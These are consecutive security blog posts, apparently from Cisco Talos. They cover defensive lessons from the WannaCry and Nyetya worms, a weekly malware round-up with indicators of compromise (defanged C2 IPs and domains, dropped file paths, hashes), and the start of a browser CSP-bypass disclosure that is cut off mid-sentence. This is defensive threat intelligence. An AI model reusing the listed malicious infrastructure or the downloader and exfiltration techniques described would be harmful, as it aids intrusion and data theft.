The delivery mechanism used by the two malware families was significantly different. WannaCry was simple: find or build a vulnerable SMBv1 server and infect it causing it to scan the internet and propagate. Nyetya was significantly more advanced. The attackers behind the Nyetya worm were able to successfully compromise a server used to distribute software updates for a piece of software used extensively within a specific geographic region. As mentioned in our blog post here, it is possible that the reason the attacker chose to expose, or make known that they had this level of access to systems within the targeted geographic region is due to them having additional comparable capabilities that may be used in the future.

Propagation

The propagation mechanisms used by Nyetya, featuring similar capabilities as WannaCry, included several additional methods that were available to Nyetya, and included credential compromise. Rather than simply relying on the SMBv1 vulnerability, Nyetya also featured the ability to leverage PSExec and WMI. Additionally, while WannaCry was programmed to spread across both internal and external networks and contained code level issues with the scanning functionality leading to performance deficiencies, Nyetya only propagated internally within compromised environments. It is possible that this was done to limit the impact of the malware to only the specific region or organizations being targeted.

Mission Objective

The suspected mission objectives for both of these cases were also different. With WannaCry, it seems reasonable to conclude that the malware was simply a poorly executed attempt to generate revenue through the mass deployment of ransomware. The inclusion of what is referred to as a "killswitch", a single domain designated to control the malware spread, made it easy for security researchers to stop the spread of this malware and indicates how unsophisticated the programmer(s) really were. The attacker's later movement of the bitcoins from the WannaCry bitcoin wallets also seems to further support that hypothesis. With Nyetya, the mission objective appears to have been causing operational disruption within a targeted environment. Nyetya wiping portions of the hard drive of infected systems and providing no mechanism for reversing that process also seems to support this hypothesis.

What Could Have Been Done Differently?

Getting back to the basics of information security would have been an effective means of either preventing or seriously limiting the impact of both of these threats.

Patching

WannaCry was easily avoidable for most organizations. Simply installing the security update associated with MS17-010 would have prevented a successful WannaCry infection. There have been several arguments made about whether or not this was possible on older systems still being actively used in some organizations. WannaCry's implementation of the exploit code targeting the MS17-010 vulnerability did not even run properly on most of these systems. Microsoft eventually released updates for MS17-010 for these older operating systems as well.

As has been emphasized by the security community for many years, effective patch management is a vital security control that organizations simply must implement within their environments. We have seen many attacks become successful simply because an organization failed to patch their environments. Reliable exploits for 0-day vulnerabilities are often very expensive for attackers, while patched public exploits are very cheap. Attackers simply will not typically utilize a 0-day vulnerability if they can find a cheaper means to achieve their mission objective. As an organization, in most cases if a system within your environment is compromised due to a 0-day vulnerability being exploited, that is a good indicator that you are doing everything else effectively because it means that the attacker likely could not find another cheaper avenue to breach your defenses.

Least Functionality

Only implement system functionality that is required for systems to perform their intended role or function. Microsoft recommends disabling SMBv1 if it is not required. Likewise, limiting access to systems and services is another vital security control. Even if SMBv1 is in use on a system, it is rare for it to be required to be exposed to hostile network environments like the internet. Leveraging host-based firewalls, like the one built into the Windows operating system even on internal network segments is another way to control access to these services.

Least Privilege

Limit the use of administrative tools like WMI and PSExec to only those systems from which system administrators are performing system management functions. Monitoring for the use of these tools across an organization's network, while not necessarily a preventative security control, can be used to quickly identify compromised systems and enable organizations to initiate appropriate incident response processes.

System and Network Monitoring

Computer worms typically propagate very quickly, making them extremely loud in most environments. In both of these cases, the worm would initiate a scanning function to identify new hosts to propagate to. Monitoring the environment for service sweeps, or attempts to connect to many systems by a single system on a network within a short period of time could allow for early identification of compromised systems so that the issue can be addressed before it causes a larger organizational impact.

Network Segmentation

Even in environments where it was simply not possible to install the security update associated with MS17-010, network segmentation is a good way to either prevent a successful attack or limit the possible impact of a successful attack to the rest of the organization's environment. Creating "choke-points" in communications pathways is a great way to not only limit the impact of a successful compromise, but also provides an ideal location to deploy network-based security controls that can be used to prevent a successful attack from occurring in the first place. As was previously described, the principle of least functionality would dictate that at each of these choke-points, access controls would be deployed to limit communications to only what is actually required for systems to serve their role within the business. Flat networks, while easy to manage and maintain, afford little in the way of mitigating the impact of an attack like WannaCry or Nyetya.

Processes and Policies

It is essential that organizations have established policies and processes in place to ensure that they are prepared to respond appropriately and effectively when the unexpected happens. Disaster Recovery and Business Continuity Plans enable organizations to recover from unplanned system outages or disasters. In order for these processes to remain effective over time, organizations must not only have the plans in place, but they must be tested and validated over time to ensure that they continue to meet the needs of the organization. Can your organization recover from a system outage quickly enough to meet its business needs? Is your backup strategy working (i.e. can you recover using your backups alone?) These needs change over time and testing these processes will help ensure they remain effective before an outage or disaster occurs. Incident Response is another example of a process that should be in place and tested periodically through the use of hunting exercises, tabletop exercises, and walkthroughs. This is the only way to truly ensure that the incident response team has the knowledge and tools necessary to effectively respond when security events occur within an environment.

Conclusion

WannaCry and Nyetya are two examples of events that resulted in many organizations around the world being significantly impacted by malware. These events underscore the need to get back to the basics from an information security perspective to ensure that organizations are adequately protected and ready to respond to disruptive events that may occur within their environments. Computer worms are nothing new, they have been around for decades. Having a sound, layered, defense-in-depth strategy in place will ensure that organizations can prevent widespread system outages, and detect and respond when system compromise occurs within their environments to minimize the impact these events may have.

The National Institute of Standards and Technology (NIST) has released Special Publication 800-53 "Security and Privacy Controls for Federal Information Systems and Organizations" which provides comprehensive guidance regarding recommended best practices and the selection of security controls that can be implemented to establish a sound defensive architecture within networked environments. This guidance is available here.

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between August 25 and September 1. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

• Doc.Downloader.TrickBot-6336123-0
  Downloader
  Campaigns continue to distribute new TrickBot samples through malspam & document based downloaders. This recent variant of downloader mimics account correspondence from a large financial institution, but the macro used for fetching a TrickBot sample has been stripped down to a simple deobfuscation & shell invocation.
   
• Doc.Dropper.Agent-6336106-0
  Office Macro Downloader
  This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable.
   
• Doc.Macro.Obfuscation-6336014-0
  Office Macro
  This cluster of Office Macro documents use the same obfuscation technique to prevent quick analysis. Manual analysis of the obfuscation technique shows many variables and instructions that are not used or evaulated to junk code.
   
• Doc.Trojan.Agent-6336128-0
  Office Macro based downloader
  This set of downloaders uses string obfuscation in VBA to build a download command for the shell and execute it with the VBA Shell function. It was recently observed delivering TrickBot among other paylods.
   
• Vbs.Trojan.VBSTrojan-6336102-0
  Trojan
  This Visual Basic script downloader fetches a binary from the internet and install it into the system.
   
• Win.Malware.Dinwod-6336124-0
  Dropper
  Dinwod is a polymorphic dropper. It copies modified versions of itself to the root directory then deletes the original file. The copies drop the payload DLL in the Windows directory, then force legitimate processes to run the payload via DLL injection.
   
• Win.Trojan.AlmanCloud-6336008
  Trojan
  This is a Trojan. It contains many anti-debugging and anti-vm tricks to hinder the dynamic analysis and detect instrumented envrionments. The binary can try also to register itself as a Windows service and it modifies the host file. Moreover, it has functionalities to infect USB drives plugged to the victim's computer and it may work also as keylogger. Finally, it has code to contact remote servers and upload the collected information.
   
• Win.Trojan.Cuegoe-6336130-0
  Trojan
  This is a trojan downloader. The payload varies and is unpacked inside a lengthy linear decryption routine.
   

---

Threats

Doc.Downloader.TrickBot-6336123-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500
• Outlook_Perf_Library_Lock_PID_90c

IP Addresses

• 210[.]16[.]102[.]251
• 216[.]239[.]32[.]21
• 93[.]114[.]64[.]118
• 5[.]152[.]210[.]179
• 146[.]255[.]36[.]1

Domain Names

• evaluator-expert[.]ro

Files and or directories created

• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\bicprcv.exe
• %AppData%\winapp\Modules\systeminfo64
• \srvsvc
• %TEMP%\cdqfm.bat
• %AppData%\winapp\group_tag
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\cdqfm.bat
• %TEMP%\bicprcv.exe
• %AppData%\winapp\Modules\injectDll64_configs\dpost
• %AppData%\winapp\Modules\injectDll64_configs\dinj
• %AppData%\winapp\aganpat.exe
• %AppData%\winapp\Modules\injectDll64
• %AppData%\winapp\client_id
• %AppData%\winapp\ahboqbu.exe
• %AppData%\winapp\Modules\injectDll64_configs\sinj

File Hashes

• 14ab690a2f5d4fd74f280804a1b59f5c5442c1280e79ee861e68a421cac80ce3
• 2419210bdd20b352b357573e72eb82bafa801b078f25517546bd348e2e93a505

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Doc.Dropper.Agent-6336106-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 185[.]165[.]29[.]27
• 185[.]165[.]29[.]129

Domain Names

• oceanclubsreloaded[.]us
• oceanfreightclubs[.]ir

Files and or directories created

• \TEMP\New Purchase Order.xls
• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40DVD2HR\OT[1].exe
• %AppData%\Microsoft\Office\Recent\New Purchase Order.LNK
• %AppData%\Microsoft\Office\Recent\272622119.xls.LNK
• %TEMP%\wbfg.exe

File Hashes

• 56ef4bb6608968653af98649fddf204933134038b6b27b118ebedcdc5ec5af0e
• 946def9e50a762ef29de5b56086d976f26446f0bcb5f2590c0354eae1318e0fb
• 220128b685d4e96e793756636e32257b8fd22e038890d8f194d1681343bea923
• a4ad5629d490b466e4e62bf9048968ff45466c73849609b64d6617bf32e5cc5f
• d6ece69e9f8035de573411d57ea11e0bb22d243e0d47b620b9cb99793218b121
• aecf2b9c77b76f08c6a240cd5b0782f3abba0a872caea783f5105b3b3f42851a

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Doc.Macro.Obfuscation-6336014-0

Indicators of Compromise

Registry Keys

• <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
• Value: PnpInstanceID
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES
• Value: 3488D8938CAA8400F802C2439F4B8FCDCE406396
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\3488D8938CAA8400F802C2439F4B8FCDCE406396

Mutexes

• socket.1
• socket.0
• tty_list::mutex.0
• socket.2
• Global\刐ƶ

IP Addresses

• 82[.]195[.]75[.]101
• 91[.]219[.]237[.]229
• 109[.]163[.]234[.]8
• 38[.]229[.]72[.]16
• 23[.]21[.]138[.]252
• 31[.]185[.]104[.]20
• 78[.]47[.]38[.]226
• 104[.]20[.]73[.]28
• 184[.]73[.]220[.]206
• 46[.]28[.]110[.]244
• 81[.]7[.]16[.]182
• 198[.]199[.]64[.]217
• 174[.]129[.]241[.]106
• 50[.]19[.]238[.]1
• 154[.]35[.]132[.]70
• 62[.]210[.]92[.]11
• 72[.]21[.]81[.]200
• 151[.]80[.]42[.]103
• 5[.]39[.]92[.]199
• 86[.]59[.]21[.]38
• 192[.]30[.]255[.]120
• 192[.]30[.]255[.]121
• 185[.]100[.]86[.]128
• 144[.]76[.]163[.]93
• 178[.]62[.]22[.]36
• 104[.]20[.]74[.]28
• 51[.]254[.]101[.]242
• 46[.]252[.]26[.]2
• 89[.]45[.]235[.]21
• 192[.]168[.]1[.]1
• 178[.]62[.]86[.]96
• 178[.]62[.]197[.]82
• 52[.]173[.]193[.]166
• 192[.]168[.]1[.]255
• 120[.]29[.]217[.]46
• 138[.]201[.]14[.]197
• 86[.]59[.]119[.]88
• 192[.]30[.]255[.]113
• 192[.]30[.]255[.]112
• 85[.]25[.]116[.]81
• 107[.]22[.]255[.]198
• 23[.]23[.]170[.]235
• 192[.]168[.]1[.]127

Domain Names

• fv-st-konrad[.]de
• www[.]fv-st-konrad[.]de
• api[.]ipify[.]org
• api[.]nuget[.]org
• chocolatey[.]org
• dist[.]torproject[.]org

Files and or directories created

• %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\cert8.db
• %TEMP%\ts\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
• %TEMP%\ts\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
• %AppData%\MS\s\SECURITY
• %AppData%\MS\s\EXAMPLES
• %AppData%\MS\s\socat.exe
• %TEMP%\ts\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
• %System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
• %AppData%\MS\Tor\tor.exe
• %AppData%\tor\cached-microdescs.new
• %AppData%\tor\lock
• %TEMP%\ts\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
• %TEMP%\ts\_rels\.rels
• %AppData%\MS\Tor\libgcc_s_sjlj-1.dll
• \TEMP\~$L Information.doc
• %TEMP%\ts\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
• %System32%\Tasks\MRT
• %System32%\Tasks\SC
• %TEMP%\ts\lib\net40\JetBrains.Annotations.xml
• %AppData%\MS\Tor\libevent_core-2-0-5.dll
• %TEMP%\ts\lib\net40\JetBrains.Annotations.dll
• %AppData%\MS\s\cygreadline7.dll
• %TEMP%\ts\lib\net20\JetBrains.Annotations.xml
• %AppData%\MS\Data\Tor\geoip6
• %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\prefs.js
• %TEMP%\ts\lib\net20\Microsoft.Win32.TaskScheduler.XML
• %TEMP%\ts\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
• %TEMP%\ts\lib\net20\JetBrains.Annotations.dll
• %WinDir%\AppCompat\Programs\RecentFileCache.bcf
• %AppData%\MS\Tor\zlib1.dll
• \Users\Administrator\Documents\20170822\PowerShell_transcript.PC.SLCVvGfn.20170822125043.txt
• %AppData%\tor\cached-microdesc-consensus
• %TEMP%\ts\lib\net40\Microsoft.Win32.TaskScheduler.XML
• %TEMP%\ts\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
• %TEMP%\ts\lib\net20\Microsoft.Win32.TaskScheduler.dll
• %AppData%\MS\Tor\libevent-2-0-5.dll
• %AppData%\MS\Tor\tor-gencert.exe
• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16FC3937-61E8-4A38-8962-5CC96E748100}.tmp
• %AppData%\MS\s\cygssl-1.0.0.dll
• %TEMP%\ts\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
• \Users\Administrator\AppData\Local\Microsoft\Windows\WER\ReportQueue\AppCrash_mshta.exe_b620274e31657385a0786969c6cab647bc5a5eb0_48824423\Report.wer
• %TEMP%\ts\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
• %AppData%\MS\s\cygwrap-0.dll
• %TEMP%\ts\lib\net452\Microsoft.Win32.TaskScheduler.dll
• %AppData%\MS\s\cygncursesw-10.dll
• %AppData%\MS\s\VERSION
• %AppData%\MS\Data\Tor\geoip
• %AppData%\MS\s\README
• %TEMP%\ts\lib\net35\JetBrains.Annotations.dll
• %TEMP%\ts\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
• %TEMP%\ts\lib\net35\JetBrains.Annotations.xml
• %TEMP%\ts\[Content_Types].xml
• \Users\Administrator\Documents\20170822\PowerShell_transcript.PC.tnwsG1BN.20170822125100.txt
• %TEMP%\ts\lib\net40\Microsoft.Win32.TaskScheduler.dll
• %AppData%\MS\s\cygcrypto-1.0.0.dll
• %AppData%\MS\Tor\libssp-0.dll
• %TEMP%\ts\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
• \TEMP\DHL Information.doc
• %TEMP%\ts\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
• %AppData%\MS\Tor\libevent_extra-2-0-5.dll
• %TEMP%\ts\lib\net452\Microsoft.Win32.TaskScheduler.XML
• %AppData%\tor\cached-certs
• \Users\Administrator\Documents\20170822\PowerShell_transcript.PC.PBM+k85t.20170822125056.txt
• %TEMP%\ts\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
• %System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms
• %AppData%\MS\s\BUGREPORTS
• %TEMP%\ts\package\services\metadata\core-properties\b413d53c92364baa9958fdda02cd8e9a.psmdcp
• %TEMP%\ts\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
• %AppData%\MS\Tor\libeay32.dll
• %TEMP%\ts\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
• %AppData%\MS\Tor\ssleay32.dll
• %TEMP%\ts\lib\net452\JetBrains.Annotations.dll
• %TEMP%\ts\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40DVD2HR\api_ipify_org[1].txt
• %TEMP%\ts\lib\net35\Microsoft.Win32.TaskScheduler.dll
• %TEMP%\ts\lib\net452\JetBrains.Annotations.xml
• %AppData%\MS\s\FAQ
• %TEMP%\ts\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
• \Users\Administrator\Documents\20170822\PowerShell_transcript.PC.MiXmZ0jf.20170822125034.txt
• %System32%\Tasks\SUT
• %AppData%\tor\state
• %TEMP%\ts\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
• %TEMP%\7238.exe
• %TEMP%\CVRD4FC.tmp.cvr
• %AppData%\MS\s\CHANGES
• %TEMP%\ts\TaskScheduler.nuspec
• %TEMP%\ts\lib\net35\Microsoft.Win32.TaskScheduler.XML
• %AppData%\MS\s\README.md
• %AppData%\Microsoft\Office\Recent\DHL Information.LNK

File Hashes

• bce01bde972b5d97e6bc163cd632fa7c2a1e9f1913abe69f8eb25d22a06063c8
• 029923c7508a27907e2c88baf9cc2effa2f78e81f4728eae2c185935f2a51fbd
• 07b63a132b60b293532787b50c7765c6af9cebcc0449592ad31dec1198fc8b5a
• 12c9ae29a83bf6ecf5766d9f51a2927d586bed20c3d37e4e150ffecadf8cd010
• 2d1cbae9da80482fffdbbcc4f761e5b12ffbfeb2446026862d381ac80fa0f335
• 4c5c70e7c517e35f93fd65aa493a9bbad63561ad7dc8b5235e23ca843c9c274e
• 5d683f41aa10da94c4737aa8901fc92b93d4f5484f4728bcbd802b9336275d59
• 8b3c33104719d76829977a595901992bb7183ded8f5d1ef379281c7c158ef803
• 900df27eff06c022c5fc9f6ebdb6f5f1a1e9d65c2de1d5f6300c899937bb95e7
• 9ef470811ceaab0d47bb4b8e0abdf7d783902c208fedda35f8292b60af7f6870
• d3bc718d0cb24a9ffb25ae75d413f29fdb173e9174fd07d06ee8bb49ebec2330
• e433044ade8b09c97cd4b2008bccb9f12d45e32f84a94efbc800754c58ed3eb2
• efe8092be61ec8c11d6152fbf569517299f3a17322a14d5e1c13350ceaeac223
• ff428dd61e1f50b36e6fc6707054840c0912455bea073edc5806467ca8cb7046
• 0009657099e7e3f555a68ae39827099905339f5dafe648585175de089a75ba6b
• 3724ecf98a0a71f54c227e00417bf0ea603ca480ac6db2a2708cc275f6227104
• 44cd48611f0044d98082ba3dd816b61fe80ee91812fc05ee1f3f37690f51bacc
• 488f6347913c580600ca24527ab8a0f3d2129c597a6398cc857eec4f1b0348c1
• 4b9f88762b2eb226b86c5bb4ce04b4ffcd07d0e332bbc92ed6dd2d7d451c8269
• 57c8d5b413e5ddc4bbf416ef8ac9b902eb1058e18b79e76ef5340c835c9cfa73
• 6fe1e272df58349481d71357488f08fda7bf4709cd72be00ce5e42c244783649
• 6fef1c02e5d06c9cd2b29fee73e796791b7b84a1875ff19296140d49823621ae
• 6ff2121b359d8a2776c25293aa96b823759b0796e559e70bc6d2e8adaf208fd7
• 8b0d3d287580a5095e92aaf357bb39e1ab754dd3eaa4ca9c2f7ee4727f5649dd
• 8e03b31baaa847ffef1df04336d7629bd8c8ca169406768479114b91b96c9092

Coverage

Screenshots of Detection

AMP

ThreatGrid

---

Doc.Trojan.Agent-6336128-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 216[.]138[.]226[.]110
• 64[.]182[.]208[.]181
• 5[.]152[.]210[.]176

Domain Names

• keybeautysystemswest[.]com
• icanhazip[.]com

Files and or directories created

• %AppData%\winapp\Nkahvx.exe
• %AppData%\winapp\client_id
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\Olaiwy.exe
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\lubuj.bat
• %AppData%\winapp\group_tag
• %WinDir%\Tasks\services update.job

File Hashes

• 9557c5337e1ebcc8dfe36e284be35c32ce22d2a4fbac56602d326598594899a8
• b20fac264fb5724f17caafc34df08fc57879c0b30d360352a8e2b1ae3f9c2022
• e77b85c8d93c7d1093eeea80621ad45ab3f091d537837a425b4e8829a2041aa4
• fef300c8fad4477c75fd83aaa5a0033ee79c46e948148b4a7ed372943c306f5d

Coverage

Screenshots of Detection

AMP

Umbrella

Umbrella


Screenshot

---

Vbs.Trojan.VBSTrojan-6336102-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: AutoDetect
• <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness

Mutexes

• N/A

IP Addresses

• 138[.]128[.]191[.]146

Domain Names

• www[.]flemingz[.]com
• flemingz[.]com

Files and or directories created

• %TEMP%\ReAIquyDcG.exe
• %TEMP%\ReAIquyDcG.exeA

File Hashes

• 940723f511b9ecaf14478330baa01d4384f168de4b9c25a42e2865fde11067e4
• 5bf717cf8794bc159f95b59fb73e46d8e46fcca03d5dca9b47d0b398fb9db17a
• a9832474a614d15382a50954c3adf5ab7774698dcf57417c80f2abc640399639

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Malware.Dinwod-6336124-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %SystemDrive%\jr8g6w6.exe
• %SystemDrive%\3t9bd.exe
• %SystemDrive%\dvdvv.exe
• %SystemDrive%\69w460.exe
• C:\Windows\friendl.dll

File Hashes

• 002eb4fddf6e8f9165e28694da6f368626282bd7e99c11f1eaeb365339c2331a
• 01b538e451a390f7cfcdc263355dca070ea1a578d083fa94762912cff36b226b
• 026a7284b6420e06f20e683054e0ed01a0afa14321fe4094c14bdb63a46ee17f
• 04d8c0fd0f85b534c8a225be38e7bda9dc7edc248b1f6419fb64a99fde5b4b11
• 050e9daae7c0778e00b17a71d70f34a9ec60c7ac1d309d53ffd23e7a74f81b2e
• 06ebf78a7f2f3cbc7a8961051f3bfe9211b8dc8fd255be6f9df7b96f261a46ad
• 07509506034c49b52314ee53984af6556396da7070c9d0069324f555f722db6d
• 076e08eb3eae357b4ee75f9bc1e9fe8a9ea3b3e3ddafe244e0583e320a0bfd26
• 07ab8a56baed7f7014781b275e8324e8bb7974360ac05d017c65d40ed05e1869
• 07b5361cde1a670a587bd7d58160c97282415a025b4b9d1efa806a121e577027

Coverage

Screenshots of Detection

AMP

ThreatGrid

---

Win.Trojan.AlmanCloud-6336008

Indicators of Compromise

Registry Keys

• <HKU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
• <HKU>\SessionInformation
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
• Value: Collection
• <HKU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
• <HKLM>\SYSTEM\ControlSet001\Services\Eventlog\Application
• <HKU>\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• <HKU>\SessionInformation
• <HKLM>\SYSTEM\ControlSet001\Enum\Root\LEGACY_RASMAN\0000\Control
• <HKLM>\SYSTEM\ControlSet001\Services\Eventlog\Application\Microsoft H.323 Telephony Service Provider
• <HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• <HKLM>\SYSTEM\ControlSet001\Enum\Root\LEGACY_TAPISRV\0000\Control

Mutexes

• \BaseNamedObjects\Global\RAS_MO_01
• Local\MSCTF.Asm.MutexDefault1
• \BaseNamedObjects\RAS_MO_02

IP Addresses

• 148[.]81[.]111[.]121

Domain Names

• klcwba[.]com
• ajiyoh[.]com
• dpwrjl[.]com
• uatcte[.]com
• imtxxh[.]com
• lobsyb[.]com
• xcckyn[.]com
• uvebwz[.]com
• iazfmh[.]com
• zisbon[.]com
• wyspqd[.]com
• oeuuvh[.]com
• udvjli[.]com
• abvjlx[.]com
• aoogeq[.]com
• ilo[.]brenz[.]pl
• lxoalw[.]com
• wvnyqa[.]com
• gnapgq[.]com
• cxniir[.]com
• gzoiji[.]com
• rrbuas[.]com
• tdsuye[.]com
• kfgsia[.]com
• vdbqhy[.]com
• ygmyqt[.]com
• upeuoz[.]com
• eqyaud[.]com
• wouaoc[.]com
• omkbel[.]com
• ioiufb[.]com
• eyakmj[.]com
• ukjqcx[.]com
• twngee[.]com
• bkegyi[.]com
• dgyolj[.]com
• ycztdl[.]com
• dtptuw[.]com
• aqqvuo[.]com
• ioafts[.]com
• caqiny[.]com
• zqkqzt[.]com
• dezims[.]com
• ukngdn[.]com
• ousvfo[.]com
• bdgxqr[.]com
• axqeuo[.]com
• bidnxy[.]com
• heuaot[.]com
• gqugaq[.]com
• aikuul[.]com
• eiijba[.]com
• qsjite[.]com
• btaeqx[.]com
• teioez[.]com
• obwijg[.]com

Files and or directories created

• %System32%\wbem\Logs\wbemess.log
• \Users\Administrator\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
• \Users\Administrator\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{684B4A19-F6D3-453D-B879-0BEB15FECE08}.FSD
• %System32%\drivers\etc\hosts
• \Users\Administrator\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
• \ntsvcs
• %WinDir%\Prefetch\273142363.EXE-3748BAA7.pf
• \lsass

File Hashes

• a0fc82de8afd8ac9d2a9df4c5f94ea0d44abdad70af70624f168c3c34036d35b
• 5e0fcf513867bb834af4ebb405a328d66838e528e32e420a89eab7b8619f1830
• 64091a671d00602e4f81f987207ac2b16f5c3e86f98add903bf369b528db2d38
• 9727223d176381c88f6f5f17a2e7f99981eaba31282a41c1ceb3158bccbe08f4
• f095ae655db18fb27667ece1c168b97d42b1b164991cda154022d6f8e270cd49

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Cuegoe-6336130-0

Indicators of Compromise

Registry Keys

• HKU\Software\Microsoft\Office\12.0\Word
• HKU\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\D.tmp
• %SystemDrive%\~$runme.docx
• %SystemDrive%\runme.exe
• %AppData%\Microsoft\Templates\~$Normal.dotm
• %SystemDrive%\runme.docx (copy)

File Hashes

• 73c4f4e0dbe8bb08fa68c7aa73e44651a322d5a04e462e546d6cf0c9e4897235
• 6d20ac8668c1876117cfb7686d1dd71a82a88bc69595a9d698591a5ea41878b6
• c8810c54be65f65747458e905afaaf534202d2c6bd5dc681309a1872042946b3
• f3b527e625e6f198b5d44150bd4b5408935e57b7f7b395deba33f1662e2a2737
• c95ad921fa61c90a84ce29748ee334827fab456bb5807ad2f3e5c688bc539903
• 5f312c0ec89ad31cb819663059c97505cc72032f429cff33c61995ca651d52c0
• afc27b6c6deace69313e1e164257ca0b5e5ce003c34c79ca1dc43dd67129f081
• 55a8224f9b571776935e0340c9093b35b90b9138ef87e8484429b27c9ea61681
• 9edbd6e5cf7cfa8f6c5ca9a80a487e420996cae0982fbcbfe72206c0b85845db
• e0d385356bc5dc0a7619553d391259b8acd0f226dafb719b505bec4cba58fb46

Coverage

Screenshots of Detection

AMP

ThreatGrid

The vulnerabilities were discovered by Nicolai Grødum of Cisco.

Today, Talos is releasing details of vulnerabilities discovered in Microsoft Edge browser as well as older versions of Google Chrome (CVE-2017-5033) and browsers based on the Webkit such as Apple Safari (CVE-2017-2419) . An attacker may be able to exploit the vulnerabilities and bypass the Content Security Policy set by the server which may lead to disclosure of confidential information. Microsoft stated that this is by design and has declined to patch this issue.

Overview

One of the fundamental security mechanisms of a web application is the so called same-origin policy, prescribing which resources may be accessed by the application code. The essence of the same-origin policy is that it allows programmatic access to web resources only to the code that originates from the same server as the data that is being accessed.

For example, a script, executing within the context of a web browser, originating from the server good.example.com should be able to access data from the same server. On the other hand, a script originating from the server evil.example.com should not be able to access any data on good.example.com.

However, many vulnerabilities in web applications allowing the attacker to bypass the same-origin policy have been discovered. One particularly successful attack technique is Cross Site Scripting (XSS). XSS allows the attacker to inject remote code within the context of the original server code executing in the browser. To the browser, the injected code would appear to originate from the same server as the legitimate application therefore allowing access to local resources that can lead to the leak of potentially confidential data to the attacker or even application session hijacking.

Content Security Policy (CSP) is a mechanism designed to prevent XSS attacks by whitelisting servers that may be used as legitimate sources for the client side web application code. Cisco researchers have found a way to bypass the Content Security Policy and allow attackers to exploit the issue and potentially disclose confidential data by injecting otherwise excluded code.

Technical details - Talos-2017-0306 (CVE-2017-2419, CVE-2017-5033)

CSP defines the Content-Security-Policy HTTP header that allows creation of a whitelist of sources and instructs the browser to only execute resources from the allowed sources specified by the policy. Even if an attacker finds a way to inject a malicious script and successfully launch a XSS attack by injecting a <script> tag with a remote script source, the remote source will not be matched by the list of allowed sources and will not be executed by the browser.

The Content-Security-Policy HTTP header defines the script-src directive which configures CSP for script code. For example, the line

